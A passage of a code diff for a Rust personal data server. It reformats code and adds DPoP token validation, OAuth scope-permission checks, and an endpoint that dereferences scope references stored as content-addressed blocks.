has expired".into()) 536 - .into_response(); 552 + return ApiError::ExpiredTokenMsg("Verification code has expired".into()).into_response(); 537 553 } 538 554 539 555 let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) { ··· 549 565 crate::comms::CommsChannel::Telegram => "telegram_verified", 550 566 crate::comms::CommsChannel::Signal => "signal_verified", 551 567 }; 552 - let update_query = format!( 553 - "UPDATE users SET {} = TRUE WHERE did = $1", 554 - verified_column 555 - ); 568 + let update_query = format!("UPDATE users SET {} = TRUE WHERE did = $1", verified_column); 556 569 if let Err(e) = sqlx::query(&update_query) 557 570 .bind(&input.did) 558 571 .execute(&state.db) ··· 567 580 row.id 568 581 ) 569 582 .execute(&state.db) 570 - .await { 583 + .await 584 + { 571 585 error!("Failed to delete verification record: {:?}", e); 572 586 } 573 587 ··· 603 617 if let Err(e) = crate::comms::enqueue_welcome(&state.db, row.id, &hostname).await { 604 618 warn!("Failed to enqueue welcome notification: {:?}", e); 605 619 } 606 - let email_verified = matches!( 607 - row.channel, 608 - crate::comms::CommsChannel::Email 609 - ); 620 + let email_verified = matches!(row.channel, crate::comms::CommsChannel::Email); 610 621 let preferred_channel = match row.channel { 611 622 crate::comms::CommsChannel::Email => "email", 612 623 crate::comms::CommsChannel::Discord => "discord", ··· 688 699 return ApiError::InternalError.into_response(); 689 700 } 690 701 let (channel_str, recipient) = match row.channel { 691 - crate::comms::CommsChannel::Email => { 692 - ("email", row.email.unwrap_or_default()) 693 - } 694 - crate::comms::CommsChannel::Discord => { 695 - ("discord", row.discord_id.unwrap_or_default()) 696 - } 702 + crate::comms::CommsChannel::Email => ("email", row.email.unwrap_or_default()), 703 + crate::comms::CommsChannel::Discord => ("discord", row.discord_id.unwrap_or_default()), 697 704 crate::comms::CommsChannel::Telegram => { 698 705 ("telegram", row.telegram_username.unwrap_or_default()) 699 706 } 700 - crate::comms::CommsChannel::Signal => { 701 - ("signal", row.signal_number.unwrap_or_default()) 702 - } 707 + crate::comms::CommsChannel::Signal => ("signal", row.signal_number.unwrap_or_default()), 703 708 }; 704 709 if let Err(e) = crate::comms::enqueue_signup_verification( 705 710 &state.db, ··· 740 745 .and_then(|v| v.to_str().ok()) 741 746 .and_then(|v| v.strip_prefix("Bearer ")) 742 747 .and_then(|token| crate::auth::get_jti_from_token(token).ok()); 743 - let result = sqlx::query_as::<_, (i32, String, chrono::DateTime<chrono::Utc>, chrono::DateTime<chrono::Utc>)>( 748 + let result = sqlx::query_as::< 749 + _, 750 + ( 751 + i32, 752 + String, 753 + chrono::DateTime<chrono::Utc>, 754 + chrono::DateTime<chrono::Utc>, 755 + ), 756 + >( 744 757 r#" 745 758 SELECT id, access_jti, created_at, refresh_expires_at 746 759 FROM session_tokens ··· 759 772 id: id.to_string(), 760 773 created_at: created_at.to_rfc3339(), 761 774 expires_at: expires_at.to_rfc3339(), 762 - is_current: current_jti.as_ref().map_or(false, |j| j == &access_jti), 775 + is_current: current_jti.as_ref() == Some(&access_jti), 763 776 }) 764 777 .collect(); 765 778 (StatusCode::OK, Json(ListSessionsOutput { sessions })).into_response()
+123 -11
src/api/temp.rs
··· 6 6 http::{HeaderMap, StatusCode}, 7 7 response::{IntoResponse, Response}, 8 8 }; 9 - use serde::Serialize; 9 + use cid::Cid; 10 + use jacquard_repo::storage::BlockStore; 11 + use serde::{Deserialize, Serialize}; 10 12 use serde_json::json; 13 + use std::str::FromStr; 11 14 12 15 #[derive(Serialize)] 13 16 #[serde(rename_all = "camelCase")] ··· 23 26 if let Some(token) = 24 27 extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok())) 25 28 && let Ok(user) = validate_bearer_token(&state.db, &token).await 26 - && user.is_oauth { 27 - return ( 28 - StatusCode::FORBIDDEN, 29 - Json(json!({ 30 - "error": "Forbidden", 31 - "message": "OAuth credentials are not supported for this endpoint" 32 - })), 33 - ) 34 - .into_response(); 35 - } 29 + && user.is_oauth 30 + { 31 + return ( 32 + StatusCode::FORBIDDEN, 33 + Json(json!({ 34 + "error": "Forbidden", 35 + "message": "OAuth credentials are not supported for this endpoint" 36 + })), 37 + ) 38 + .into_response(); 39 + } 36 40 Json(CheckSignupQueueOutput { 37 41 activated: true, 38 42 place_in_queue: None, ··· 40 44 }) 41 45 .into_response() 42 46 } 47 + 48 + #[derive(Deserialize)] 49 + #[serde(rename_all = "camelCase")] 50 + pub struct DereferenceScopeInput { 51 + pub scope: String, 52 + } 53 + 54 + #[derive(Serialize)] 55 + #[serde(rename_all = "camelCase")] 56 + pub struct DereferenceScopeOutput { 57 + pub scope: String, 58 + } 59 + 60 + pub async fn dereference_scope( 61 + State(state): State<AppState>, 62 + headers: HeaderMap, 63 + Json(input): Json<DereferenceScopeInput>, 64 + ) -> Response { 65 + let token = match extract_bearer_token_from_header( 66 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 67 + ) { 68 + Some(t) => t, 69 + None => { 70 + return ( 71 + StatusCode::UNAUTHORIZED, 72 + Json(json!({"error": "AuthenticationRequired"})), 73 + ) 74 + .into_response(); 75 + } 76 + }; 77 + 78 + if validate_bearer_token(&state.db, &token).await.is_err() { 79 + return ( 80 + StatusCode::UNAUTHORIZED, 81 + Json(json!({"error": "AuthenticationFailed"})), 82 + ) 83 + .into_response(); 84 + } 85 + 86 + let scope_parts: Vec<&str> = input.scope.split_whitespace().collect(); 87 + let mut resolved_scopes: Vec<String> = Vec::new(); 88 + 89 + for part in scope_parts { 90 + if let Some(cid_str) = part.strip_prefix("ref:") { 91 + let cache_key = format!("scope_ref:{}", cid_str); 92 + if let Some(cached) = state.cache.get(&cache_key).await { 93 + for s in cached.split_whitespace() { 94 + if !resolved_scopes.contains(&s.to_string()) { 95 + resolved_scopes.push(s.to_string()); 96 + } 97 + } 98 + continue; 99 + } 100 + 101 + let cid = match Cid::from_str(cid_str) { 102 + Ok(c) => c, 103 + Err(_) => { 104 + tracing::warn!("Invalid CID in scope ref: {}", cid_str); 105 + continue; 106 + } 107 + }; 108 + 109 + let block_bytes = match state.block_store.get(&cid).await { 110 + Ok(Some(b)) => b, 111 + Ok(None) => { 112 + tracing::warn!("Scope ref block not found: {}", cid_str); 113 + continue; 114 + } 115 + Err(e) => { 116 + tracing::warn!("Error fetching scope ref block {}: {:?}", cid_str, e); 117 + continue; 118 + } 119 + }; 120 + 121 + let scope_record: serde_json::Value = match serde_ipld_dagcbor::from_slice(&block_bytes) 122 + { 123 + Ok(v) => v, 124 + Err(e) => { 125 + tracing::warn!("Failed to decode scope ref block {}: {:?}", cid_str, e); 126 + continue; 127 + } 128 + }; 129 + 130 + if let Some(scope_value) = scope_record.get("scope").and_then(|v| v.as_str()) { 131 + let _ = state 132 + .cache 133 + .set( 134 + &cache_key, 135 + scope_value, 136 + std::time::Duration::from_secs(3600), 137 + ) 138 + .await; 139 + for s in scope_value.split_whitespace() { 140 + if !resolved_scopes.contains(&s.to_string()) { 141 + resolved_scopes.push(s.to_string()); 142 + } 143 + } 144 + } 145 + } else if !resolved_scopes.contains(&part.to_string()) { 146 + resolved_scopes.push(part.to_string()); 147 + } 148 + } 149 + 150 + Json(DereferenceScopeOutput { 151 + scope: resolved_scopes.join(" "), 152 + }) 153 + .into_response() 154 + }
+31 -21
src/api/verification.rs
··· 49 49 .await 50 50 { 51 51 Ok(id) => id, 52 - Err(_) => return ( 53 - StatusCode::INTERNAL_SERVER_ERROR, 54 - Json(json!({"error": "InternalError", "message": "User not found"})), 55 - ) 56 - .into_response(), 52 + Err(_) => { 53 + return ( 54 + StatusCode::INTERNAL_SERVER_ERROR, 55 + Json(json!({"error": "InternalError", "message": "User not found"})), 56 + ) 57 + .into_response(); 58 + } 57 59 }; 58 60 59 61 let channel_str = input.channel.as_str(); ··· 88 90 .into_response(), 89 91 }; 90 92 91 - let pending_identifier = match record.pending_identifier { 92 - Some(p) => p, 93 - None => return ( 94 - StatusCode::BAD_REQUEST, 95 - Json(json!({"error": "InvalidRequest", "message": "No pending identifier found"})), 96 - ) 97 - .into_response(), 98 - }; 93 + let pending_identifier = 94 + match record.pending_identifier { 95 + Some(p) => p, 96 + None => return ( 97 + StatusCode::BAD_REQUEST, 98 + Json(json!({"error": "InvalidRequest", "message": "No pending identifier found"})), 99 + ) 100 + .into_response(), 101 + }; 99 102 100 103 if record.expires_at < Utc::now() { 101 104 return ( ··· 115 118 116 119 let mut tx = match state.db.begin().await { 117 120 Ok(tx) => tx, 118 - Err(_) => return ( 119 - StatusCode::INTERNAL_SERVER_ERROR, 120 - Json(json!({"error": "InternalError"})), 121 - ) 122 - .into_response(), 121 + Err(_) => { 122 + return ( 123 + StatusCode::INTERNAL_SERVER_ERROR, 124 + Json(json!({"error": "InternalError"})), 125 + ) 126 + .into_response(); 127 + } 123 128 }; 124 129 125 130 let update_result = match channel_str { ··· 148 153 149 154 if let Err(e) = update_result { 150 155 error!("Failed to update user channel: {:?}", e); 151 - if channel_str == "email" && e.as_database_error().map(|db| db.is_unique_violation()).unwrap_or(false) { 156 + if channel_str == "email" 157 + && e.as_database_error() 158 + .map(|db| db.is_unique_violation()) 159 + .unwrap_or(false) 160 + { 152 161 return ( 153 162 StatusCode::BAD_REQUEST, 154 163 Json(json!({"error": "EmailTaken", "message": "Email already in use"})), ··· 168 177 channel_str as _ 169 178 ) 170 179 .execute(&mut *tx) 171 - .await { 180 + .await 181 + { 172 182 error!("Failed to delete verification record: {:?}", e); 173 183 return ( 174 184 StatusCode::INTERNAL_SERVER_ERROR, ··· 177 187 .into_response(); 178 188 } 179 189 180 - if let Err(_) = tx.commit().await { 190 + if tx.commit().await.is_err() { 181 191 return ( 182 192 StatusCode::INTERNAL_SERVER_ERROR, 183 193 Json(json!({"error": "InternalError"})),
+18 -18
src/appview/mod.rs
··· 83 83 pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> { 84 84 { 85 85 let cache = self.did_cache.read().await; 86 - if let Some(cached) = cache.get(did) { 87 - if cached.resolved_at.elapsed() < self.cache_ttl { 88 - return Some(ResolvedService { 89 - url: cached.url.clone(), 90 - did: cached.did.clone(), 91 - }); 92 - } 86 + if let Some(cached) = cache.get(did) 87 + && cached.resolved_at.elapsed() < self.cache_ttl 88 + { 89 + return Some(ResolvedService { 90 + url: cached.url.clone(), 91 + did: cached.did.clone(), 92 + }); 93 93 } 94 94 } 95 95 ··· 240 240 } 241 241 } 242 242 243 - if let Some(service) = doc.service.first() { 244 - if service.service_endpoint.starts_with("http") { 245 - warn!( 246 - "No explicit AppView service found for {}, using first service: {}", 247 - doc.id, service.service_endpoint 248 - ); 249 - return Some(ResolvedService { 250 - url: service.service_endpoint.clone(), 251 - did: doc.id.clone(), 252 - }); 253 - } 243 + if let Some(service) = doc.service.first() 244 + && service.service_endpoint.starts_with("http") 245 + { 246 + warn!( 247 + "No explicit AppView service found for {}, using first service: {}", 248 + doc.id, service.service_endpoint 249 + ); 250 + return Some(ResolvedService { 251 + url: service.service_endpoint.clone(), 252 + did: doc.id.clone(), 253 + }); 254 254 } 255 255 256 256 if doc.id.starts_with("did:web:") {
+107 -21
src/auth/extractor.rs
··· 8 8 9 9 use super::{ 10 10 AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, 11 - validate_bearer_token_cached_allow_deactivated, 11 + validate_bearer_token_cached_allow_deactivated, validate_token_with_dpop, 12 12 }; 13 13 use crate::state::AppState; 14 14 ··· 63 63 } 64 64 } 65 65 66 + #[cfg(test)] 66 67 fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> { 67 68 let auth_header = auth_header.trim(); 68 69 ··· 151 152 .to_str() 152 153 .map_err(|_| AuthError::InvalidFormat)?; 153 154 154 - let token = extract_bearer_token(auth_header)?; 155 + let extracted = 156 + extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?; 157 + 158 + if extracted.is_dpop { 159 + let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok()); 160 + let method = parts.method.as_str(); 161 + let uri = parts.uri.to_string(); 155 162 156 - match validate_bearer_token_cached(&state.db, &state.cache, token).await { 157 - Ok(user) => Ok(BearerAuth(user)), 158 - Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 159 - Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 160 - Err(_) => Err(AuthError::AuthenticationFailed), 163 + match validate_token_with_dpop( 164 + &state.db, 165 + &extracted.token, 166 + true, 167 + dpop_proof, 168 + method, 169 + &uri, 170 + false, 171 + ) 172 + .await 173 + { 174 + Ok(user) => Ok(BearerAuth(user)), 175 + Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 176 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 177 + Err(_) => Err(AuthError::AuthenticationFailed), 178 + } 179 + } else { 180 + match validate_bearer_token_cached(&state.db, &state.cache, &extracted.token).await { 181 + Ok(user) => Ok(BearerAuth(user)), 182 + Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 183 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 184 + Err(_) => Err(AuthError::AuthenticationFailed), 185 + } 161 186 } 162 187 } 163 188 } ··· 178 203 .to_str() 179 204 .map_err(|_| AuthError::InvalidFormat)?; 180 205 181 - let token = extract_bearer_token(auth_header)?; 206 + let extracted = 207 + extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?; 182 208 183 - match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await { 184 - Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 185 - Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 186 - Err(_) => Err(AuthError::AuthenticationFailed), 209 + if extracted.is_dpop { 210 + let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok()); 211 + let method = parts.method.as_str(); 212 + let uri = parts.uri.to_string(); 213 + 214 + match validate_token_with_dpop( 215 + &state.db, 216 + &extracted.token, 217 + true, 218 + dpop_proof, 219 + method, 220 + &uri, 221 + true, 222 + ) 223 + .await 224 + { 225 + Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 226 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 227 + Err(_) => Err(AuthError::AuthenticationFailed), 228 + } 229 + } else { 230 + match validate_bearer_token_cached_allow_deactivated( 231 + &state.db, 232 + &state.cache, 233 + &extracted.token, 234 + ) 235 + .await 236 + { 237 + Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 238 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 239 + Err(_) => Err(AuthError::AuthenticationFailed), 240 + } 187 241 } 188 242 } 189 243 } ··· 204 258 .to_str() 205 259 .map_err(|_| AuthError::InvalidFormat)?; 206 260 207 - let token = extract_bearer_token(auth_header)?; 261 + let extracted = 262 + extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?; 208 263 209 - match validate_bearer_token_cached(&state.db, &state.cache, token).await { 210 - Ok(user) => { 211 - if !user.is_admin { 212 - return Err(AuthError::AdminRequired); 264 + let user = if extracted.is_dpop { 265 + let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok()); 266 + let method = parts.method.as_str(); 267 + let uri = parts.uri.to_string(); 268 + 269 + match validate_token_with_dpop( 270 + &state.db, 271 + &extracted.token, 272 + true, 273 + dpop_proof, 274 + method, 275 + &uri, 276 + false, 277 + ) 278 + .await 279 + { 280 + Ok(user) => user, 281 + Err(TokenValidationError::AccountDeactivated) => { 282 + return Err(AuthError::AccountDeactivated); 213 283 } 214 - Ok(BearerAuthAdmin(user)) 284 + Err(TokenValidationError::AccountTakedown) => { 285 + return Err(AuthError::AccountTakedown); 286 + } 287 + Err(_) => return Err(AuthError::AuthenticationFailed), 215 288 } 216 - Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 217 - Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 218 - Err(_) => Err(AuthError::AuthenticationFailed), 289 + } else { 290 + match validate_bearer_token_cached(&state.db, &state.cache, &extracted.token).await { 291 + Ok(user) => user, 292 + Err(TokenValidationError::AccountDeactivated) => { 293 + return Err(AuthError::AccountDeactivated); 294 + } 295 + Err(TokenValidationError::AccountTakedown) => { 296 + return Err(AuthError::AccountTakedown); 297 + } 298 + Err(_) => return Err(AuthError::AuthenticationFailed), 299 + } 300 + }; 301 + 302 + if !user.is_admin { 303 + return Err(AuthError::AdminRequired); 219 304 } 305 + Ok(BearerAuthAdmin(user)) 220 306 } 221 307 } 222 308
+65 -38
src/auth/mod.rs
··· 5 5 use std::time::Duration; 6 6 7 7 use crate::cache::Cache; 8 + use crate::oauth::scopes::ScopePermissions; 8 9 9 10 pub mod extractor; 11 + pub mod scope_check; 10 12 pub mod service; 11 13 pub mod token; 12 14 pub mod verify; ··· 15 17 AuthError, BearerAuth, BearerAuthAdmin, BearerAuthAllowDeactivated, ExtractedToken, 16 18 extract_auth_token_from_header, extract_bearer_token_from_header, 17 19 }; 20 + pub use service::{ServiceTokenClaims, ServiceTokenVerifier, is_service_token}; 18 21 pub use token::{ 19 22 SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS, 20 23 TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token, ··· 24 27 pub use verify::{ 25 28 get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token, 26 29 }; 27 - pub use service::{ServiceTokenClaims, ServiceTokenVerifier, is_service_token}; 28 30 29 31 const KEY_CACHE_TTL_SECS: u64 = 300; 30 32 const SESSION_CACHE_TTL_SECS: u64 = 60; ··· 53 55 pub key_bytes: Option<Vec<u8>>, 54 56 pub is_oauth: bool, 55 57 pub is_admin: bool, 58 + pub scope: Option<String>, 59 + } 60 + 61 + impl AuthenticatedUser { 62 + pub fn permissions(&self) -> ScopePermissions { 63 + if !self.is_oauth { 64 + return ScopePermissions::from_scope_string(Some("atproto")); 65 + } 66 + ScopePermissions::from_scope_string(self.scope.as_deref()) 67 + } 56 68 } 57 69 58 70 pub async fn validate_bearer_token( ··· 114 126 } 115 127 } 116 128 117 - let (decrypted_key, deactivated_at, takedown_ref, is_admin) = if let Some(key) = cached_key { 129 + let (decrypted_key, deactivated_at, takedown_ref, is_admin) = if let Some(key) = cached_key 130 + { 118 131 let user_status = sqlx::query!( 119 132 "SELECT deactivated_at, takedown_ref, is_admin FROM users WHERE did = $1", 120 133 did ··· 125 138 .flatten(); 126 139 127 140 match user_status { 128 - Some(status) => (Some(key), status.deactivated_at, status.takedown_ref, status.is_admin), 141 + Some(status) => ( 142 + Some(key), 143 + status.deactivated_at, 144 + status.takedown_ref, 145 + status.is_admin, 146 + ), 129 147 None => (None, None, None, false), 130 148 } 131 149 } else if let Some(user) = sqlx::query!( ··· 153 171 .await; 154 172 } 155 173 156 - (Some(key), user.deactivated_at, user.takedown_ref, user.is_admin) 174 + ( 175 + Some(key), 176 + user.deactivated_at, 177 + user.takedown_ref, 178 + user.is_admin, 179 + ) 157 180 } else { 158 181 (None, None, None, false) 159 182 }; ··· 194 217 195 218 session_valid = session_exists.is_some(); 196 219 197 - if session_valid 198 - && let Some(c) = cache { 199 - let _ = c 200 - .set( 201 - &session_cache_key, 202 - "1", 203 - Duration::from_secs(SESSION_CACHE_TTL_SECS), 204 - ) 205 - .await; 206 - } 220 + if session_valid && let Some(c) = cache { 221 + let _ = c 222 + .set( 223 + &session_cache_key, 224 + "1", 225 + Duration::from_secs(SESSION_CACHE_TTL_SECS), 226 + ) 227 + .await; 228 + } 207 229 } 208 230 209 231 if session_valid { ··· 212 234 key_bytes: Some(decrypted_key), 213 235 is_oauth: false, 214 236 is_admin, 237 + scope: None, 215 238 }); 216 239 } 217 240 } ··· 232 255 .await 233 256 .ok() 234 257 .flatten() 235 - { 236 - if !allow_deactivated && oauth_token.deactivated_at.is_some() { 237 - return Err(TokenValidationError::AccountDeactivated); 238 - } 258 + { 259 + if !allow_deactivated && oauth_token.deactivated_at.is_some() { 260 + return Err(TokenValidationError::AccountDeactivated); 261 + } 239 262 240 - if oauth_token.takedown_ref.is_some() { 241 - return Err(TokenValidationError::AccountTakedown); 242 - } 263 + if oauth_token.takedown_ref.is_some() { 264 + return Err(TokenValidationError::AccountTakedown); 265 + } 243 266 244 - let now = chrono::Utc::now(); 245 - if oauth_token.expires_at > now { 246 - let key_bytes = if let (Some(kb), Some(ev)) = 247 - (&oauth_token.key_bytes, oauth_token.encryption_version) 248 - { 249 - crate::config::decrypt_key(kb, Some(ev)).ok() 250 - } else { 251 - None 252 - }; 253 - return Ok(AuthenticatedUser { 254 - did: oauth_token.did, 255 - key_bytes, 256 - is_oauth: true, 257 - is_admin: oauth_token.is_admin, 258 - }); 259 - } 267 + let now = chrono::Utc::now(); 268 + if oauth_token.expires_at > now { 269 + let key_bytes = if let (Some(kb), Some(ev)) = 270 + (&oauth_token.key_bytes, oauth_token.encryption_version) 271 + { 272 + crate::config::decrypt_key(kb, Some(ev)).ok() 273 + } else { 274 + None 275 + }; 276 + return Ok(AuthenticatedUser { 277 + did: oauth_token.did, 278 + key_bytes, 279 + is_oauth: true, 280 + is_admin: oauth_token.is_admin, 281 + scope: oauth_info.scope, 282 + }); 260 283 } 284 + } 261 285 262 286 Err(TokenValidationError::AuthenticationFailed) 263 287 } ··· 314 338 if user_info.takedown_ref.is_some() { 315 339 return Err(TokenValidationError::AccountTakedown); 316 340 } 317 - let key_bytes = if let (Some(kb), Some(ev)) = (&user_info.key_bytes, user_info.encryption_version) { 341 + let key_bytes = if let (Some(kb), Some(ev)) = 342 + (&user_info.key_bytes, user_info.encryption_version) 343 + { 318 344 crate::config::decrypt_key(kb, Some(ev)).ok() 319 345 } else { 320 346 None ··· 324 350 key_bytes, 325 351 is_oauth: true, 326 352 is_admin: user_info.is_admin, 353 + scope: result.scope, 327 354 }) 328 355 } 329 356 Err(_) => Err(TokenValidationError::AuthenticationFailed),
+118
src/auth/scope_check.rs
··· 1 + #![allow(clippy::result_large_err)] 2 + 3 + use axum::http::StatusCode; 4 + use axum::response::{IntoResponse, Response}; 5 + use serde_json::json; 6 + 7 + use crate::oauth::scopes::{ 8 + AccountAction, AccountAttr, IdentityAttr, RepoAction, ScopePermissions, 9 + }; 10 + 11 + pub fn check_repo_scope( 12 + is_oauth: bool, 13 + scope: Option<&str>, 14 + action: RepoAction, 15 + collection: &str, 16 + ) -> Result<(), Response> { 17 + if !is_oauth { 18 + return Ok(()); 19 + } 20 + 21 + let permissions = ScopePermissions::from_scope_string(scope); 22 + permissions.assert_repo(action, collection).map_err(|e| { 23 + ( 24 + StatusCode::FORBIDDEN, 25 + axum::Json(json!({ 26 + "error": "InsufficientScope", 27 + "message": e.to_string() 28 + })), 29 + ) 30 + .into_response() 31 + }) 32 + } 33 + 34 + pub fn check_blob_scope(is_oauth: bool, scope: Option<&str>, mime: &str) -> Result<(), Response> { 35 + if !is_oauth { 36 + return Ok(()); 37 + } 38 + 39 + let permissions = ScopePermissions::from_scope_string(scope); 40 + permissions.assert_blob(mime).map_err(|e| { 41 + ( 42 + StatusCode::FORBIDDEN, 43 + axum::Json(json!({ 44 + "error": "InsufficientScope", 45 + "message": e.to_string() 46 + })), 47 + ) 48 + .into_response() 49 + }) 50 + } 51 + 52 + pub fn check_rpc_scope( 53 + is_oauth: bool, 54 + scope: Option<&str>, 55 + aud: &str, 56 + lxm: &str, 57 + ) -> Result<(), Response> { 58 + if !is_oauth { 59 + return Ok(()); 60 + } 61 + 62 + let permissions = ScopePermissions::from_scope_string(scope); 63 + permissions.assert_rpc(aud, lxm).map_err(|e| { 64 + ( 65 + StatusCode::FORBIDDEN, 66 + axum::Json(json!({ 67 + "error": "InsufficientScope", 68 + "message": e.to_string() 69 + })), 70 + ) 71 + .into_response() 72 + }) 73 + } 74 + 75 + pub fn check_account_scope( 76 + is_oauth: bool, 77 + scope: Option<&str>, 78 + attr: AccountAttr, 79 + action: AccountAction, 80 + ) -> Result<(), Response> { 81 + if !is_oauth { 82 + return Ok(()); 83 + } 84 + 85 + let permissions = ScopePermissions::from_scope_string(scope); 86 + permissions.assert_account(attr, action).map_err(|e| { 87 + ( 88 + StatusCode::FORBIDDEN, 89 + axum::Json(json!({ 90 + "error": "InsufficientScope", 91 + "message": e.to_string() 92 + })), 93 + ) 94 + .into_response() 95 + }) 96 + } 97 + 98 + pub fn check_identity_scope( 99 + is_oauth: bool, 100 + scope: Option<&str>, 101 + attr: IdentityAttr, 102 + ) -> Result<(), Response> { 103 + if !is_oauth { 104 + return Ok(()); 105 + } 106 + 107 + let permissions = ScopePermissions::from_scope_string(scope); 108 + permissions.assert_identity(attr).map_err(|e| { 109 + ( 110 + StatusCode::FORBIDDEN, 111 + axum::Json(json!({ 112 + "error": "InsufficientScope", 113 + "message": e.to_string() 114 + })), 115 + ) 116 + .into_response() 117 + }) 118 + }
+6 -5
src/auth/service.rs
··· 278 278 279 279 fn parse_did_key_multibase(multibase: &str) -> Result<VerifyingKey> { 280 280 if !multibase.starts_with('z') { 281 - return Err(anyhow!("Expected base58btc multibase encoding (starts with 'z')")); 281 + return Err(anyhow!( 282 + "Expected base58btc multibase encoding (starts with 'z')" 283 + )); 282 284 } 283 285 284 - let (_, decoded) = multibase::decode(multibase) 285 - .map_err(|e| anyhow!("Failed to decode multibase: {}", e))?; 286 + let (_, decoded) = 287 + multibase::decode(multibase).map_err(|e| anyhow!("Failed to decode multibase: {}", e))?; 286 288 287 289 if decoded.len() < 2 { 288 290 return Err(anyhow!("Invalid multicodec data")); ··· 302 304 return Err(anyhow!("Only secp256k1 keys are supported")); 303 305 } 304 306 305 - VerifyingKey::from_sec1_bytes(key_bytes) 306 - .map_err(|e| anyhow!("Invalid public key: {}", e)) 307 + VerifyingKey::from_sec1_bytes(key_bytes).map_err(|e| anyhow!("Invalid public key: {}", e)) 307 308 } 308 309 309 310 pub fn is_service_token(token: &str) -> bool {
+16 -14
src/auth/verify.rs
··· 113 113 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 114 114 115 115 if let Some(expected) = expected_typ 116 - && header.typ != expected { 117 - return Err(anyhow!( 118 - "Invalid token type: expected {}, got {}", 119 - expected, 120 - header.typ 121 - )); 122 - } 116 + && header.typ != expected 117 + { 118 + return Err(anyhow!( 119 + "Invalid token type: expected {}, got {}", 120 + expected, 121 + header.typ 122 + )); 123 + } 123 124 124 125 let signature_bytes = URL_SAFE_NO_PAD 125 126 .decode(signature_b64) ··· 185 186 } 186 187 187 188 if let Some(expected) = expected_typ 188 - && header.typ != expected { 189 - return Err(anyhow!( 190 - "Invalid token type: expected {}, got {}", 191 - expected, 192 - header.typ 193 - )); 194 - } 189 + && header.typ != expected 190 + { 191 + return Err(anyhow!( 192 + "Invalid token type: expected {}, got {}", 193 + expected, 194 + header.typ 195 + )); 196 + } 195 197 196 198 let signature_bytes = URL_SAFE_NO_PAD 197 199 .decode(signature_b64)
+2 -2
src/comms/mod.rs
··· 8 8 }; 9 9 10 10 pub use service::{ 11 - CommsService, channel_display_name, enqueue_2fa_code, enqueue_account_deletion, 12 - enqueue_comms, enqueue_email_update, enqueue_email_verification, enqueue_password_reset, 11 + CommsService, channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_comms, 12 + enqueue_email_update, enqueue_email_verification, enqueue_password_reset, 13 13 enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, 14 14 }; 15 15
+2 -1
src/comms/sender.rs
··· 87 87 88 88 pub fn from_env() -> Option<Self> { 89 89 let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?; 90 - let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "Tranquil PDS".to_string()); 90 + let from_name = 91 + std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "Tranquil PDS".to_string()); 91 92 Some(Self::new(from_address, from_name)) 92 93 } 93 94
+1 -1
src/comms/service.rs
··· 10 10 use uuid::Uuid; 11 11 12 12 use super::sender::{CommsSender, SendError}; 13 - use super::types::{NewComms, CommsChannel, CommsStatus, QueuedComms}; 13 + use super::types::{CommsChannel, CommsStatus, NewComms, QueuedComms}; 14 14 15 15 pub struct CommsService { 16 16 db: PgPool,
+9 -3
src/config.rs
··· 46 46 } 47 47 }); 48 48 49 - if jwt_secret.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() { 49 + if jwt_secret.len() < 32 50 + && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() 51 + { 50 52 panic!("JWT_SECRET must be at least 32 characters"); 51 53 } 52 54 53 - if dpop_secret.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() { 55 + if dpop_secret.len() < 32 56 + && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() 57 + { 54 58 panic!("DPOP_SECRET must be at least 32 characters"); 55 59 } 56 60 ··· 97 101 } 98 102 }); 99 103 100 - if master_key.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() { 104 + if master_key.len() < 32 105 + && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() 106 + { 101 107 panic!("MASTER_KEY must be at least 32 characters"); 102 108 } 103 109
+5 -4
src/crawlers.rs
